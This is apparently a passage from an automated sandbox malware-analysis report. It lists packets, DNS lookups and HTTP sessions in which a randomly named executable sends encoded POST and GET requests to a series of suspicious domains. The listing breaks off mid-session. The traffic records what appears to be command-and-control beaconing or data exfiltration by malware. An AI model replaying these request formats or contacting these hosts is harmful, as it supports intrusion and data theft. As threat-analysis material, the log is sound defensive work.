                                                                Jan 11, 2025 05:12:09.524897099 CET8050007209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:09.524974108 CET5000780192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:09.540302038 CET5000780192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:09.545125008 CET8050007209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:09.545272112 CET8050007209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:10.244792938 CET8050007209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:10.244803905 CET8050007209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:10.244812012 CET8050007209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:10.245023012 CET5000780192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:11.045030117 CET5000780192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:12.063658953 CET5000880192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:12.068573952 CET8050008209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:12.068679094 CET5000880192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:12.077794075 CET5000880192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:12.082740068 CET8050008209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:12.676372051 CET8050008209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:12.676511049 CET8050008209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:12.676593065 CET5000880192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:12.679514885 CET5000880192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:12.684340954 CET8050008209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:17.762537003 CET5000980192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:17.767329931 CET8050009199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:17.767448902 CET5000980192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:17.783098936 CET5000980192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:17.787944078 CET8050009199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:18.242116928 CET8050009199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:18.242187023 CET8050009199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:18.242239952 CET8050009199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:18.242280960 CET5000980192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:18.242309093 CET5000980192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:19.295941114 CET5000980192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:20.313605070 CET5001080192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:20.318496943 CET8050010199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:20.318613052 CET5001080192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:20.332845926 CET5001080192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:20.337753057 CET8050010199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:20.814001083 CET8050010199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:20.814074039 CET8050010199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:20.814126015 CET8050010199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:20.814141035 CET5001080192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:20.814198971 CET5001080192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:20.815969944 CET8050010199.59.243.228192.168.2.7
                                                                Jan 11, 2025 05:12:20.816024065 CET5001080192.168.2.7199.59.243.228
                                                                Jan 11, 2025 05:12:21.841969013 CET5001080192.168.2.7199.59.243.228
                                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                Jan 11, 2025 05:10:12.977731943 CET | 192.168.2.7 | 1.1.1.1 | 0x28bf | Standard query (0) | www.bpgroup.site | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:10:29.112189054 CET | 192.168.2.7 | 1.1.1.1 | 0x3c6b | Standard query (0) | www.bookingservice.center | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:10:42.548074007 CET | 192.168.2.7 | 1.1.1.1 | 0xb685 | Standard query (0) | www.tempatmudisini06.click | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:10:56.392246008 CET | 192.168.2.7 | 1.1.1.1 | 0x5ef6 | Standard query (0) | www.hm35s.top | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:11:10.095010996 CET | 192.168.2.7 | 1.1.1.1 | 0x667 | Standard query (0) | www.snehasfashion.shop | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:11:23.548346996 CET | 192.168.2.7 | 1.1.1.1 | 0x4f05 | Standard query (0) | www.sitioseguro.blog | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:11:36.814445972 CET | 192.168.2.7 | 1.1.1.1 | 0x6fa1 | Standard query (0) | www.windsky.click | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:11:50.299015999 CET | 192.168.2.7 | 1.1.1.1 | 0xedd | Standard query (0) | www.cssa.auction | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:12:04.220552921 CET | 192.168.2.7 | 1.1.1.1 | 0xbdc5 | Standard query (0) | www.moviebuff.info | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:12:17.690448999 CET | 192.168.2.7 | 1.1.1.1 | 0x6bda | Standard query (0) | www.whisperart.net | A (IP address) | IN (0x0001) | false
                                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                Jan 11, 2025 05:10:13.448195934 CET | 1.1.1.1 | 192.168.2.7 | 0x28bf | No error (0) | www.bpgroup.site | bpgroup.site |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                Jan 11, 2025 05:10:13.448195934 CET | 1.1.1.1 | 192.168.2.7 | 0x28bf | No error (0) | bpgroup.site |  | 74.48.143.82 | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:10:29.348176003 CET | 1.1.1.1 | 192.168.2.7 | 0x3c6b | No error (0) | www.bookingservice.center |  | 98.124.224.17 | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:10:42.807002068 CET | 1.1.1.1 | 192.168.2.7 | 0xb685 | No error (0) | www.tempatmudisini06.click | tempatmudisini06.click |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                Jan 11, 2025 05:10:42.807002068 CET | 1.1.1.1 | 192.168.2.7 | 0xb685 | No error (0) | tempatmudisini06.click |  | 103.21.221.4 | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:10:56.538146019 CET | 1.1.1.1 | 192.168.2.7 | 0x5ef6 | No error (0) | www.hm35s.top | hm35s.top |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                Jan 11, 2025 05:10:56.538146019 CET | 1.1.1.1 | 192.168.2.7 | 0x5ef6 | No error (0) | hm35s.top |  | 154.23.184.95 | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:11:10.146513939 CET | 1.1.1.1 | 192.168.2.7 | 0x667 | No error (0) | www.snehasfashion.shop | snehasfashion.shop |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                Jan 11, 2025 05:11:10.146513939 CET | 1.1.1.1 | 192.168.2.7 | 0x667 | No error (0) | snehasfashion.shop |  | 88.198.8.150 | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:11:23.561949015 CET | 1.1.1.1 | 192.168.2.7 | 0x4f05 | No error (0) | www.sitioseguro.blog |  | 104.21.15.100 | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:11:23.561949015 CET | 1.1.1.1 | 192.168.2.7 | 0x4f05 | No error (0) | www.sitioseguro.blog |  | 172.67.162.39 | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:11:36.827228069 CET | 1.1.1.1 | 192.168.2.7 | 0x6fa1 | No error (0) | www.windsky.click |  | 46.253.5.221 | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:11:50.996249914 CET | 1.1.1.1 | 192.168.2.7 | 0xedd | No error (0) | www.cssa.auction | cssa.auction |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                Jan 11, 2025 05:11:50.996249914 CET | 1.1.1.1 | 192.168.2.7 | 0xedd | No error (0) | cssa.auction |  | 107.167.84.42 | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:12:04.237979889 CET | 1.1.1.1 | 192.168.2.7 | 0xbdc5 | No error (0) | www.moviebuff.info |  | 209.74.77.109 | A (IP address) | IN (0x0001) | false
                                                                Jan 11, 2025 05:12:17.760059118 CET | 1.1.1.1 | 192.168.2.7 | 0x6bda | No error (0) | www.whisperart.net |  | 199.59.243.228 | A (IP address) | IN (0x0001) | false
                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                0 | 192.168.2.7 | 49974 | 74.48.143.82 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:10:13.472395897 CET | 449 | OUT | GET /p8wp/?SVjx=u6ApldVh4TiTWl&-Jkp4f=XBEmzwHL3IPy9fzNy+mt0a1h64egiA/nosfb/2OhlZZwotDgHxcXOtzA1prhF0ec+MC5UU6vEfUJUDhxTQZrgjhE6i9RZbIooo4nNVZMxCeQfnPSfF8xtI64tEPJw4kQE2O0gU/hSVG6 HTTP/1.1
                                                                Host: www.bpgroup.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:10:14.069103956 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1251
                                                                date: Sat, 11 Jan 2025 04:10:14 GMT
                                                                server: LiteSpeed
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                Jan 11, 2025 05:10:14.069128036 CET | 253 | IN | Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                1 | 192.168.2.7 | 49976 | 98.124.224.17 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:10:29.378839970 CET | 732 | OUT | POST /47f1/ HTTP/1.1
                                                                Host: www.bookingservice.center
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.bookingservice.center
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.bookingservice.center/47f1/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f=MMfsStaAwy1DiXTSkGSV3ugOr/poGLCoyvuVSqHUH5KnRY4J9vc5C0ggo4PwXXx/Q//A76HBMfVhGpE0DCt15VIIsHY8/QSw+JMRZ0xcOCVcmpcr9k9CDUEfcoa9lYWPxXjQz61dTiWsiW/1JtHsrdsDqVBdwKmDXZItDqYCzwdRvAUQkcT5B06jfYgEREYBDoy21cKS7oHrn/+X4g==
                                                                Jan 11, 2025 05:10:29.897224903 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Server: Microsoft-IIS/10.0
                                                                X-Powered-By: ASP.NET
                                                                X-Frame-Options: SAMEORIGIN
                                                                Date: Sat, 11 Jan 2025 04:10:29 GMT
                                                                Connection: close
                                                                Content-Length: 1245
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                Jan 11, 2025 05:10:29.897244930 CET | 218 | IN | Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                2 | 192.168.2.7 | 49977 | 98.124.224.17 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:10:31.933536053 CET | 752 | OUT | POST /47f1/ HTTP/1.1
                                                                Host: www.bookingservice.center
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.bookingservice.center
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.bookingservice.center/47f1/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f=MMfsStaAwy1Dh3DS3VKV2OgNu/poPrCsyuSVSuefELenfawJv7I5H0gg8oP5TXxKQ/7y7//BMfxhGrM0DztyrVIKnnYEiASw+JMRZ0lmOCdcmaEr9F9DK0Ecdoa9hYWLxXjuz+sGTkSsiTD1J4rvhdtpk1BJwqjbWJUpP7Yi2Qc7jWVy++fVflCYbaEyGiF0Bp2u4++zkfiBqtfTubiI+cJCVzpMBRsofCgCRdc=
                                                                Jan 11, 2025 05:10:32.449974060 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Server: Microsoft-IIS/10.0
                                                                X-Powered-By: ASP.NET
                                                                X-Frame-Options: SAMEORIGIN
                                                                Date: Sat, 11 Jan 2025 04:10:31 GMT
                                                                Connection: close
                                                                Content-Length: 1245
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                Jan 11, 2025 05:10:32.450020075 CET | 218 | IN | Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                3 | 192.168.2.7 | 49978 | 98.124.224.17 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:10:34.474505901 CET | 1765 | OUT | POST /47f1/ HTTP/1.1
                                                                Host: www.bookingservice.center
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.bookingservice.center
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.bookingservice.center/47f1/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:10:34.983858109 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Server: Microsoft-IIS/10.0
                                                                X-Powered-By: ASP.NET
                                                                X-Frame-Options: SAMEORIGIN
                                                                Date: Sat, 11 Jan 2025 04:10:34 GMT
                                                                Connection: close
                                                                Content-Length: 1245
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                Jan 11, 2025 05:10:34.983899117 CET | 218 | IN
                                                                Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                4 | 192.168.2.7 | 49979 | 98.124.224.17 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:10:37.015678883 CET | 458 | OUT | GET /47f1/?-Jkp4f=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT7FZPnmIkgRyT2IIjZ1tDFAd1kYY85WNZHG4rc4iGu4bn6UDT+t8IWznL&SVjx=u6ApldVh4TiTWl HTTP/1.1
                                                                Host: www.bookingservice.center
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:10:37.532408953 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Server: Microsoft-IIS/10.0
                                                                X-Powered-By: ASP.NET
                                                                X-Frame-Options: SAMEORIGIN
                                                                Date: Sat, 11 Jan 2025 04:10:36 GMT
                                                                Connection: close
                                                                Content-Length: 1245
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                Jan 11, 2025 05:10:37.532457113 CET | 218 | IN
                                                                Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                5 | 192.168.2.7 | 49981 | 103.21.221.4 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:10:42.828474045 CET | 735 | OUT | POST /4iun/ HTTP/1.1
                                                                Host: www.tempatmudisini06.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.tempatmudisini06.click
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.tempatmudisini06.click/4iun/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:10:43.716552019 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 796
                                                                date: Sat, 11 Jan 2025 04:10:43 GMT
                                                                server: LiteSpeed
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                6 | 192.168.2.7 | 49982 | 103.21.221.4 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:10:45.379293919 CET | 755 | OUT | POST /4iun/ HTTP/1.1
                                                                Host: www.tempatmudisini06.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.tempatmudisini06.click
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.tempatmudisini06.click/4iun/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:10:46.260484934 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 796
                                                                date: Sat, 11 Jan 2025 04:10:46 GMT
                                                                server: LiteSpeed
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                7 | 192.168.2.7 | 49983 | 103.21.221.4 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:10:47.931823969 CET | 1768 | OUT | POST /4iun/ HTTP/1.1
                                                                Host: www.tempatmudisini06.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.tempatmudisini06.click
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.tempatmudisini06.click/4iun/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:10:48.816044092 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 796
                                                                date: Sat, 11 Jan 2025 04:10:48 GMT
                                                                server: LiteSpeed
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                8 | 192.168.2.7 | 49984 | 103.21.221.4 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
